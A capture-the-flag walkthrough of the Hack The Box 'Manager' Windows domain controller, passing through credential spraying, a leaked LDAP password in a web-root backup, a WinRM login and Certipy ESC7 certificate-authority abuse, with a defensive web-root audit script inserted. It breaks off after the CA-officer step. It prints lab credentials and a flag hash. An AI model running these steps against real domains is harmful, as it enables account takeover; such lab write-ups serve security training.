HTB Manager (done)
OS: Windows
Technology: MSSQL, SMB
IP Address: 10.10.11.236
Open ports:
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-23 05:11:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
49740/tcp open msrpc Microsoft Windows RPC
Users and passwords:
SMB (found by brute force, username = password):
L: operator
P: operator
---
MSSQL database login:
L: manager/operator
P: operator
---
From hidden file .old-conf.xml:
L: raven@manager.htb
P: R4v3nBe5tD3veloP3r!123
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.236_nmap 10.10.11.236 ; cat 10.10.11.236_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-22 22:09 UTC
Nmap scan report for 10.10.11.236
Host is up (0.035s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-23 05:11:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-08-23T05:12:46+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-08-23T05:12:46+00:00; +7h00m00s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-08-23T05:07:50
|_Not valid after: 2054-08-23T05:07:50
|_ssl-date: 2024-08-23T05:12:46+00:00; +6h59m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-08-23T05:12:46+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-08-23T05:12:46+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
49740/tcp open msrpc Microsoft Windows RPC
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ cat /etc/hosts | grep manager
10.10.11.236 manager.htb dc01.manager.htb
Ffuf - http://manager.htb/
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ ffuf -u http://manager.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o manager.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://manager.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : manager.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
About.html [Status: 200, Size: 5386, Words: 1310, Lines: 157, Duration: 46ms]
Contact.html [Status: 200, Size: 5317, Words: 1298, Lines: 165, Duration: 57ms]
Images [Status: 301, Size: 149, Words: 9, Lines: 2, Duration: 40ms]
[INFO] Adding a new job to the queue: http://manager.htb/Images/FUZZ
Index.html [Status: 200, Size: 18203, Words: 6791, Lines: 507, Duration: 41ms]
about.html [Status: 200, Size: 5386, Words: 1310, Lines: 157, Duration: 48ms]
contact.html [Status: 200, Size: 5317, Words: 1298, Lines: 165, Duration: 47ms]
css [Status: 301, Size: 146, Words: 9, Lines: 2, Duration: 60ms]
[INFO] Adding a new job to the queue: http://manager.htb/css/FUZZ
images [Status: 301, Size: 149, Words: 9, Lines: 2, Duration: 53ms]
[INFO] Adding a new job to the queue: http://manager.htb/images/FUZZ
index.html [Status: 200, Size: 18203, Words: 6791, Lines: 507, Duration: 63ms]
js [Status: 301, Size: 145, Words: 9, Lines: 2, Duration: 44ms]
[INFO] Adding a new job to the queue: http://manager.htb/js/FUZZ
service.html [Status: 200, Size: 7900, Words: 2395, Lines: 224, Duration: 58ms]
[INFO] Starting queued job on target: http://manager.htb/Images/FUZZ
[INFO] Starting queued job on target: http://manager.htb/css/FUZZ
[INFO] Starting queued job on target: http://manager.htb/images/FUZZ
[INFO] Starting queued job on target: http://manager.htb/js/FUZZ
:: Progress: [122814/122814] :: Job [5/5] :: 888 req/sec :: Duration: [0:02:15] :: Errors: 14 ::
SMB - rabbit hole
Nothing interesting here (anonymous login only gives READ on IPC$)
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ crackmapexec smb 10.10.11.236 --shares -u 'anonymous' -p ''
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\anonymous:
SMB 10.10.11.236 445 DC01 [+] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL Logon server share
Lookup SID
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ /home/kali/.local/bin/lookupsid.py -no-pass [email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.11.236
[*] StringBinding ncacn_np:10.10.11.236[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
Create a wordlist of usernames from the lookupsid output
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ cat pre_user.txt
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ cat pre_user.txt | grep -i user | awk -F'\' '{print $2}' | awk '{print $1}' | grep -Ev "DC01|Domain|Protected" | tr '[:upper:]' '[:lower:]' | tee users.txt
administrator
guest
krbtgt
zhong
cheng
ryan
raven
jinwoo
chinhae
operator
SMB - brute force
Spray the username list against itself; found creds for SMB (username = password):
L: operator
P: operator
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ crackmapexec smb 10.10.11.236 -u users.txt -p users.txt --continue-on-success | grep "[+]"
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
SMB - list of shares - rabbit hole
Rabbit hole - nothing interesting here
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ smbclient //10.10.11.236/SYSVOL -U operator
Password for [WORKGROUP\operator]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jul 27 10:19:07 2023
.. D 0 Thu Jul 27 10:19:07 2023
manager.htb Dr 0 Thu Jul 27 10:19:07 2023
5446399 blocks of size 4096. 632757 blocks available
smb: \> cd manager.htb\
smb: \manager.htb\> dir
. D 0 Thu Jul 27 10:25:25 2023
.. D 0 Thu Jul 27 10:25:25 2023
DfsrPrivate DHSr 0 Thu Jul 27 10:25:25 2023
Policies D 0 Thu Jul 27 10:19:12 2023
scripts D 0 Thu Jul 27 10:19:07 2023
5446399 blocks of size 4096. 632757 blocks available
smb: \manager.htb\>
MSSQL - list files
Login to database
L: manager/operator
P: operator
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Manager/impacket-mssqlshell]
└─$ /home/kali/.local/bin/mssqlclient.py manager/operator:operator@10.10.11.236 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
List all files in the webserver folder (C:\inetpub\wwwroot) with xp_dirtree
---
payload:
exec xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
---
SQL> exec xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
subdirectory depth file
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------- -----------
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
SQL>
Download the backup file from the webserver and unzip it
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ wget manager.htb/website-backup-27-07-23-old.zip
--2024-08-26 21:21:08-- http://manager.htb/website-backup-27-07-23-old.zip
Resolving manager.htb (manager.htb)... 10.10.11.236
Connecting to manager.htb (manager.htb)|10.10.11.236|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’
website-backup-27-07-23-old.z 100%[===============================================>] 1021K 3.86MB/s in 0.3s
2024-08-26 21:21:09 (3.86 MB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ unzip website-backup-27-07-23-old.zip -d website-backup-27-07-23-old
Archive: website-backup-27-07-23-old.zip
inflating: website-backup-27-07-23-old/.old-conf.xml
inflating: website-backup-27-07-23-old/about.html
inflating: website-backup-27-07-23-old/contact.html
inflating: website-backup-27-07-23-old/css/bootstrap.css
inflating: website-backup-27-07-23-old/css/responsive.css
inflating: website-backup-27-07-23-old/css/style.css
inflating: website-backup-27-07-23-old/css/style.css.map
inflating: website-backup-27-07-23-old/css/style.scss
inflating: website-backup-27-07-23-old/images/about-img.png
inflating: website-backup-27-07-23-old/images/body_bg.jpg
extracting: website-backup-27-07-23-old/images/call.png
extracting: website-backup-27-07-23-old/images/call-o.png
inflating: website-backup-27-07-23-old/images/client.jpg
inflating: website-backup-27-07-23-old/images/contact-img.jpg
extracting: website-backup-27-07-23-old/images/envelope.png
extracting: website-backup-27-07-23-old/images/envelope-o.png
inflating: website-backup-27-07-23-old/images/hero-bg.jpg
extracting: website-backup-27-07-23-old/images/location.png
extracting: website-backup-27-07-23-old/images/location-o.png
extracting: website-backup-27-07-23-old/images/logo.png
inflating: website-backup-27-07-23-old/images/menu.png
extracting: website-backup-27-07-23-old/images/next.png
extracting: website-backup-27-07-23-old/images/next-white.png
inflating: website-backup-27-07-23-old/images/offer-img.jpg
inflating: website-backup-27-07-23-old/images/prev.png
extracting: website-backup-27-07-23-old/images/prev-white.png
extracting: website-backup-27-07-23-old/images/quote.png
extracting: website-backup-27-07-23-old/images/s-1.png
extracting: website-backup-27-07-23-old/images/s-2.png
extracting: website-backup-27-07-23-old/images/s-3.png
extracting: website-backup-27-07-23-old/images/s-4.png
extracting: website-backup-27-07-23-old/images/search-icon.png
inflating: website-backup-27-07-23-old/index.html
inflating: website-backup-27-07-23-old/js/bootstrap.js
inflating: website-backup-27-07-23-old/js/jquery-3.4.1.min.js
inflating: website-backup-27-07-23-old/service.html
Find creds in hidden file: .old-conf.xml
---
L: raven@manager.htb
P: R4v3nBe5tD3veloP3r!123
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ cd website-backup-27-07-23-old
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Manager/website-backup-27-07-23-old]
└─$ ls -a
. .. about.html contact.html css images index.html js .old-conf.xml service.html
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Manager/website-backup-27-07-23-old]
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
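Added defender-side example (mine, not from the writeup): the foothold came from an old site backup left inside the web root whose hidden .old-conf.xml carried an LDAP bind password. The script walks a web root, flags backup/archive files, opens zip archives and checks their members for hidden or config files containing password-like settings. The sample tree it builds is constructed to mirror this box's wwwroot layout, with a placeholder secret; the extension lists and the secret regex are assumptions to tune per environment.

```python
"""Audit a web root for exposed backups and credential-bearing config files."""
import os
import re
import tempfile
import zipfile

# File types that have no business being served from a web root.
ARCHIVE_EXT = {".zip", ".bak", ".old", ".backup", ".7z", ".rar", ".tar", ".gz"}
# Config formats whose content is worth inspecting for secrets.
CONFIG_EXT = {".xml", ".config", ".conf", ".ini", ".json", ".yml", ".yaml"}
# Crude but effective: the .old-conf.xml on this box used a <password> tag.
SECRET_RE = re.compile(r"<password>|password\s*=|passwd|bindpw", re.IGNORECASE)


def classify_member(name, data):
    """Return the reasons a single file (name + raw bytes) is risky, if any."""
    base = os.path.basename(name)
    ext = os.path.splitext(base)[1].lower()
    reasons = []
    if base.startswith("."):
        reasons.append("hidden file")
    if ext in CONFIG_EXT and SECRET_RE.search(data.decode("utf-8", "replace")):
        reasons.append("contains credential-like setting")
    return reasons


def scan_webroot(root):
    """Walk `root` and return {relative_path: [reasons]} for risky files.

    Zip archives are opened and their members checked as well; those are
    reported as 'archive.zip::member' so the nesting is visible.
    """
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            ext = os.path.splitext(fname)[1].lower()
            reasons = []
            if ext in ARCHIVE_EXT or re.search(r"backup|\.old\b", fname, re.I):
                reasons.append("backup/archive in web root")
            with open(full, "rb") as fh:
                reasons += classify_member(fname, fh.read())
            if reasons:
                findings[rel] = reasons
            if zipfile.is_zipfile(full):
                with zipfile.ZipFile(full) as zf:
                    for info in zf.infolist():
                        if info.is_dir():
                            continue
                        inner = classify_member(info.filename, zf.read(info))
                        if inner:
                            findings[rel + "::" + info.filename] = inner
    return findings


def build_sample_webroot():
    """Constructed fixture shaped like this box's wwwroot (placeholder secret)."""
    root = tempfile.mkdtemp(prefix="wwwroot-")
    for page in ("index.html", "about.html", "contact.html", "service.html"):
        with open(os.path.join(root, page), "w") as fh:
            fh.write("<html></html>")
    with open(os.path.join(root, "web.config"), "w") as fh:
        fh.write("<configuration><system.webServer /></configuration>")
    backup = os.path.join(root, "website-backup-27-07-23-old.zip")
    with zipfile.ZipFile(backup, "w") as zf:
        zf.writestr("index.html", "<html></html>")
        zf.writestr(".old-conf.xml",
                    "<ldap-conf><access-user><user>svc@example.test</user>"
                    "<password>PLACEHOLDER-NOT-A-REAL-SECRET</password>"
                    "</access-user></ldap-conf>")
    return root


if __name__ == "__main__":
    for path, why in sorted(scan_webroot(build_sample_webroot()).items()):
        print(path + ": " + ", ".join(why))
```

Run against the real web root (for example from a scheduled task on the IIS host) and treat any hit as a change-control failure: backups belong outside the served tree.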
Read flag: user.txt
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Manager/website-backup-27-07-23-old]
└─$ evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> dir
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ..
*Evil-WinRM* PS C:\Users\Raven> dir
Directory: C:\Users\Raven
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/27/2023 8:24 AM Desktop
d-r--- 7/27/2023 8:23 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\Raven> cd Desktop
*Evil-WinRM* PS C:\Users\Raven\Desktop> dir
Directory: C:\Users\Raven\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/25/2024 10:05 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
3727734656bd91ce7b2d10297a14ecb2
*Evil-WinRM* PS C:\Users\Raven\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Raven\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.236
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
*Evil-WinRM* PS C:\Users\Raven\Desktop>
Privilege Escalation
Find vulnerable ADCS (Active Directory Certificate Services) configuration
Certipy reports ESC7: user Raven has dangerous permissions (ManageCa) on the CA
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
Add Manage Certificates
I need to use the Manage CA permission to give Raven the Manage Certificates permission (add Raven as a CA officer)
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Confirm the new permission for user Raven
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad find -dc-ip 10.10.11.236 -ns 10.10.11.236 -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
Enable the SubCA template on the CA
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
